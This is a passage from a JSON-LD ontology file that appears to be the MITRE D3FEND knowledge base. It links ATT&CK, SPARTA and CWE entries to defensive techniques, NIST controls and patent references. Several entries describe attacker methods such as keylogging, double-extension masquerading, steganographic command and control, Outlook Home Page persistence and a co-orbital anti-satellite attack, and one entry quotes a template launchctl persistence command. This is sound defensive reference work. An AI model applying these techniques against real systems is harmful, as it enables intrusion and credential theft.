      "d3f:definition": "Internet network traffic is network traffic that crosses a boundary between networks. [This is the general sense of inter-networking; It may or may not cross to or from the Internet]",
      "rdfs:label": "Internet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:AccountLocking"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        }
      ],
      "d3f:control-name": "Account Management | Automated System Account Management",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(1)"
    },
    {
      "@id": "_:N52bcce88f8b64d478051312d08a742b2",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Classifying"
          },
          {
            "@id": "d3f:Forecasting"
          },
          {
            "@id": "d3f:Generation"
          },
          {
            "@id": "d3f:Matching"
          },
          {
            "@id": "d3f:Summarizing"
          }
        ]
      }
    },
    {
      "@id": "d3f:PasswordDatabase",
      "@type": "owl:Class",
      "d3f:definition": "A password database is a database that holds passwords for user accounts and is usually encrypted (i.e.., the passwords are hashed). Password databases are found supporting system services (such as SAM) or part of user applications such as password managers.",
      "rdfs:label": "Password Database",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:Reference-Tripwire",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://linux.die.net/man/8/tripwire"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:FileIntegrityMonitoring"
      },
      "d3f:kb-reference-title": "Reference - Tripwire",
      "rdfs:label": "Reference - Tripwire"
    },
    {
      "@id": "d3f:T1036.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.007",
      "d3f:definition": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Double File Extension",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:Nd653a2cbba19494ca92b9ae11a9b0672"
        }
      ]
    },
    {
      "@id": "_:Nd653a2cbba19494ca92b9ae11a9b0672",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:Password",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A password, sometimes called a passcode, is a memorized secret, typically a string of characters, usually used to confirm the identity of a user. Using the terminology of the NIST Digital Identity Guidelines, the secret is memorized by a party called the claimant while the party verifying the identity of the claimant is called the verifier. When the claimant successfully demonstrates knowledge of the password to the verifier through an established authentication protocol, the verifier is able to infer the claimant's identity.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Password"
      },
      "rdfs:label": "Password",
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      },
      "skos:altLabel": "Passcode"
    },
    {
      "@id": "d3f:ATLASDefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0007"
      },
      "rdfs:label": "Defense Evasion Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N39e471b9ea7a4aa48fe28237866dab10"
        }
      ],
      "skos:prefLabel": "Defense Evasion Technique"
    },
    {
      "@id": "_:N39e471b9ea7a4aa48fe28237866dab10",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0007"
      }
    },
    {
      "@id": "d3f:BusNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:BusNetworkFrame"
      },
      "d3f:definition": "The ordered flow of frames, structured by a bus protocol, that traverses the shared bus medium during operation.",
      "rdfs:label": "Bus Network Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N16b99235617e4495ad78ce492a2f2147"
        }
      ]
    },
    {
      "@id": "_:N16b99235617e4495ad78ce492a2f2147",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkFrame"
      }
    },
    {
      "@id": "d3f:EX-0017.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0017.02",
      "d3f:definition": "A co-orbital ASAT uses a spacecraft already in space to conduct a deliberate collision or near-field detonation. After insertion, often well before any hostile action, the vehicle performs rendezvous and proximity operations to achieve the desired relative geometry, then closes to impact or triggers a kinetic or explosive device. Guidance relies on relative navigation (optical, lidar, crosslink cues) and precise timing to manage closing speeds and contact angle. Compared with direct-ascent shots, co-orbital approaches can loiter, shadow, or “stalk” a target for extended periods, masking as inspection or servicing until the terminal maneuver. Effects include mechanical disruption, fragmentation, or mission-ending damage, with debris characteristics shaped by the chosen altitude, closing velocity, and collision geometry.",
      "rdfs:label": "Co-Orbital ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0017/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0017"
      },
      "skos:prefLabel": "Co-Orbital ASAT"
    },
    {
      "@id": "d3f:T1583.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.004",
      "d3f:definition": "Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked)",
      "rdfs:label": "Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:FirmwareBehaviorAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FirmwareBehaviorAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Firmware"
      },
      "d3f:d3fend-id": "D3-FBA",
      "d3f:definition": "Analyzing the behavior of embedded code in firmware and looking for anomalous behavior and suspicious activity.",
      "d3f:kb-article": "## How it works\nFirmware behavior analysis provides protections by ensuring that installed firmware has not been tampered with or modified. Firmware analysis applies to mutable firmware and immutable read-only memory (ROMs).\n\nFirmware in deployed network devices is typically not analyzed and monitored for vulnerabilities and thus is subject to potential attacks. This technique makes use of known and measured behavioral attributes, including timing attributes, of analyzed firmware on deployed devices.\n\nA behavioral method that employs known timing measurements may use the timing results from a challenge and response protocol to detect the presence of malware in embedded firmware. Firmware device timing measurements are made, specific to the installed device, and are used in the verifying function.\n\nThe original firmware image is modified by injecting a monitoring software component into the embedded firmware code. The injected software components will allow for a software root of trust, the challenge and response protocol, to be implement in the firmware.\n\nA challenge-response is issued and includes a nonce so that replays are not allowed. The firmware will calculate a checksum over all of memory, including the nonce, and return the result. The verification system will compare the computed checksum and the time it took for the computation of the checksum to determine if the firmware has been modified.\n\n## Considerations\n* The firmware code will need to be modified to include the behavioral monitoring functionality.\n* This technique is sensitive to the device the embedded firmware is hosted on and it is expected that the devices and firmware will need to be profiled and analyzed to determine timing estimation.\n* This technique is not expected to be one hundred percent correct as you would expect in a hardware root of trust solution and may require some tuning.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareBehaviorAnalysisConFirm"
        },
        {
          "@id": "d3f:Reference-FirmwareBehaviorAnalysisVIPER"
        }
      ],
      "d3f:synonym": "Firmware Timing Analysis",
      "rdfs:label": "Firmware Behavior Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N0f132d08f70743b58e8b12c17df90653"
        }
      ]
    },
    {
      "@id": "_:N0f132d08f70743b58e8b12c17df90653",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1415",
      "@type": "owl:Class",
      "d3f:attack-id": "T1415",
      "d3f:definition": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by",
      "rdfs:label": "URL Scheme Hijacking - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "URL Scheme Hijacking"
    },
    {
      "@id": "d3f:T1056.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:KeyboardInputDevice"
      },
      "d3f:attack-id": "T1056.001",
      "d3f:definition": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)",
      "rdfs:label": "Keylogging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N76baa75bfbd647e4b5e8977274ec56cb"
        }
      ]
    },
    {
      "@id": "_:N76baa75bfbd647e4b5e8977274ec56cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KeyboardInputDevice"
      }
    },
    {
      "@id": "d3f:T0864",
      "@type": "owl:Class",
      "d3f:attack-id": "T0864",
      "d3f:definition": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required.",
      "rdfs:label": "Transient Cyber Asset - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Transient Cyber Asset"
    },
    {
      "@id": "d3f:Clock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A mechanism that generates periodic, accurately spaced signals for timekeeping applications. Clocks may be implemented in hardware or software and are essential for system operations, synchronization, and event ordering.",
      "d3f:produces": {
        "@id": "d3f:TimeRecord"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/clock"
      },
      "rdfs:label": "Clock",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N82457e4960ed4ceba4610986ab46202b"
        }
      ]
    },
    {
      "@id": "_:N82457e4960ed4ceba4610986ab46202b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TimeRecord"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Malicious Code Protection | Detect Unauthorized Commands",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserBehaviorAnalysis"
      },
      "rdfs:label": "SI-3(8)"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForCausalityIdentificationAndAttributionsDeterminationOfProcessesInANetwork_PaloAltoNetworksIncCyberSecdoLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170195350A1/en?oq=US-2017195350-A1"
      },
      "d3f:kb-abstract": "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "This patent describes detecting malicious processes on a host. Agents are deployed on hosts that monitor all initiated processes and determine whether a process was initiated at boot or initiated by another process. If not initiated at boot or by another process, the process is identified as suspicious and an alert is triggered.",
      "d3f:kb-organization": "Palo Alto Networks IncCyber Secdo Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "System and methods thereof for causality identification and attributions determination of processes in a network",
      "rdfs:label": "Reference - System and methods thereof for causality identification and attributions determination of processes in a network - Palo Alto Networks IncCyber Secdo Ltd"
    },
    {
      "@id": "d3f:T1137.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.004",
      "d3f:definition": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      },
      "rdfs:label": "Outlook Home Page",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Nad610944191c4428bc58082b7382e049"
        }
      ]
    },
    {
      "@id": "_:Nad610944191c4428bc58082b7382e049",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:T1581",
      "@type": "owl:Class",
      "d3f:attack-id": "T1581",
      "d3f:definition": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1627.001",
      "rdfs:label": "Geofencing - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1627.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Geofencing"
    },
    {
      "@id": "d3f:NetworkInitScriptFileResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A computer file resource made available from one host to other hosts on a computer network that is also an initialization script.",
      "rdfs:label": "Network Init Script File Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitScript"
        },
        {
          "@id": "d3f:NetworkFileResource"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1111",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1111",
      "d3f:definition": "The product's documentation does not adequately define inputs, outputs, or system/software interfaces.",
      "rdfs:label": "Incomplete I/O Documentation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:Reference-ControllerAreaNetworkMessageAuthentication",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180131522A1"
      },
      "d3f:kb-abstract": "Method and apparatus are disclosed for controller area network message authentication. An example disclosed vehicle includes a data bus and a first control unit communicatively coupled to the data bus. The example first control unit generates a secured message by (a) calculating a message authentication code, (b) truncating the message authentication code, (c) truncating a freshness value used to generate the message authentication code, and (d) placing portions of the truncated message authentication code and the truncated freshness value in separate portions of the secured message.",
      "d3f:kb-author": "James Martin Lawlis, Douglas A. Oliver, Xin Ye",
      "d3f:kb-mitre-analysis": "This patent describes a method for securing communication by calculating a MAC, truncating it, and also truncating a freshness value (counter) to fit within the restricted data field of a CAN frame (8 bytes).",
      "d3f:kb-organization": "Ford Global Technologies LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:BusMessageAuthentication"
      },
      "d3f:kb-reference-title": "Controller area network message authentication",
      "rdfs:label": "Reference - Controller area network message authentication - Ford Global Technologies LLC"
    },
    {
      "@id": "d3f:T1002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1002",
      "d3f:definition": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1560",
      "rdfs:label": "Data Compressed",
      "rdfs:seeAlso": {
        "@id": "d3f:T1560"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:NetworkConnectionResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an attempt is made to establish a network connection.",
      "rdfs:label": "Network Connection Reset Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionEvent"
        },
        {
          "@id": "_:N89352acb408f471582104d0c8060e407"
        }
      ]
    },
    {
      "@id": "_:N89352acb408f471582104d0c8060e407",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:T1564.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.010",
      "d3f:definition": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)",
      "rdfs:label": "Process Argument Spoofing",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:T1001.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1001.002",
      "d3f:definition": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.",
      "rdfs:label": "Steganography",
      "rdfs:subClassOf": {
        "@id": "d3f:T1001"
      }
    },
    {
      "@id": "d3f:CWE-749",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-749",
      "d3f:definition": "The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.",
      "rdfs:label": "Exposed Dangerous Method or Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:M1029",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "IT disaster recovery plans are outside the current scope of D3FEND.",
      "rdfs:label": "Remote Data Storage"
    },
    {
      "@id": "d3f:T1174",
      "@type": "owl:Class",
      "d3f:attack-id": "T1174",
      "d3f:definition": "Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1556.002",
      "rdfs:label": "Password Filter DLL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1556.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:T1152",
      "@type": "owl:Class",
      "d3f:attack-id": "T1152",
      "d3f:definition": "Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made  (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as <code>launchctl submit -l <labelName> -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\"</code>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1569.001",
      "rdfs:label": "Launchctl",
      "rdfs:seeAlso": {
        "@id": "d3f:T1569.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-568",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-568",
      "d3f:definition": "The product contains a finalize() method that does not call super.finalize().",
      "rdfs:label": "finalize() Method Without super.finalize()",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-459"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:TA0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.",
      "d3f:display-order": 2,
      "rdfs:label": "Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-536",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-536",
      "d3f:definition": "A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker.",
      "rdfs:label": "Servlet Runtime Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-211"
      }
    },
    {
      "@id": "d3f:CWE-590",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-590",
      "d3f:definition": "The product calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc().",
      "d3f:weakness-of": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "rdfs:label": "Free of Memory not on the Heap",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-762"
        },
        {
          "@id": "_:N6168edd005644bdca105924a0b94b2ed"
        }
      ]
    },
    {
      "@id": "_:N6168edd005644bdca105924a0b94b2ed",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:CWE-279",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-279",
      "d3f:definition": "While it is executing, the product sets the permissions of an object in a way that violates the intended permissions that have been specified by the user.",
      "rdfs:label": "Incorrect Execution-Assigned Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:DS0030",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Instance (ATT&CK DS)"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForDetectingHomoglyphAttacksWithASiameseConvolutionalNeuralNetwork_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190019058A1/"
      },
      "d3f:kb-abstract": "The present invention utilizes computer vision technologies to identify potentially malicious URLs and executable files in a computing device. In one embodiment, a Siamese convolutional neural network is trained to identify the relative similarity between image versions of two strings of text. After the training process, a list of strings that are likely to be utilized in malicious attacks are provided (e.g., legitimate URLs for popular websites). When a new string is received, it is converted to an image and then compared against the image of list of strings. The relative similarity is determined, and if the similarity rating falls below a predetermined threshold, an alert is generated indicating that the string is potentially malicious.",
      "d3f:kb-author": "Jonathan Woodbridge; Anjum Ahuja; Daniel Grant",
      "d3f:kb-mitre-analysis": "This patent describes a mechanism to detect homoglyph strings that involves training a Siamese convolutional neural network to compare images of strings. Strings of legitimate URLs for websites along with known suspicious stings are converted to images during the training process to create an index. New strings are converted to images and then compared to the index for similarity, if the string deviates beyond a threshold an alert is triggered.",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDetection"
      },
      "d3f:kb-reference-title": "System and method for detecting homoglyph attacks with a siamese convolutional neural network",
      "rdfs:label": "Reference - System and method for detecting homoglyph attacks with a siamese convolutional neural network - Endgame Inc"
    },
    {
      "@id": "d3f:CWE-543",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-543",
      "d3f:definition": "The product uses the singleton pattern when creating a resource within a multithreaded environment.",
      "rdfs:label": "Use of Singleton Pattern Without Synchronization in a Multithreaded Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-820"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-MotionDetector",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Motion_detector"
      },
      "d3f:kb-abstract": "Overview of motion detectors, including PIR and microwave technologies, applications, and limitations.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:MotionSensorMonitoring"
      },
      "d3f:kb-reference-title": "Motion detector",
      "rdfs:label": "Reference - Wikipedia: Motion detector"
    },
    {
      "@id": "d3f:KernelModuleUnloadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the removal of a kernel module from the operating system kernel, deallocating resources and potentially altering system functionality.",
      "rdfs:label": "Kernel Module Unload Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelModuleEvent"
        },
        {
          "@id": "_:N2f49dec399b54513934873e14a132760"
        },
        {
          "@id": "_:N5056fab77dae4edf8c6ed0266f70ad04"
        }
      ]
    },
    {
      "@id": "_:N2f49dec399b54513934873e14a132760",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModuleLoadEvent"
      }
    },
    {
      "@id": "_:N5056fab77dae4edf8c6ed0266f70ad04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryDeletionEvent"
      }
    },
    {
      "@id": "d3f:Open-sourceDeveloper",
      "@type": "owl:Class",
      "d3f:definition": "An open-source developer contributes to the development, maintenance, or improvement of open-source projects.",
      "rdfs:label": "Open-source Developer",
      "rdfs:subClassOf": {
        "@id": "d3f:ProductDeveloper"
      }
    },
    {
      "@id": "d3f:T1547",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547",
      "d3f:definition": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.",
      "rdfs:label": "Boot or Logon Autostart Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:has-weakness",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-weakness y: The entity x exhibits a condition y that could, in some circumstances, lead to a vulnerability.",
      "owl:inverseOf": {
        "@id": "d3f:weakness-of"
      },
      "rdfs:label": "has-weakness",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-have-weakness"
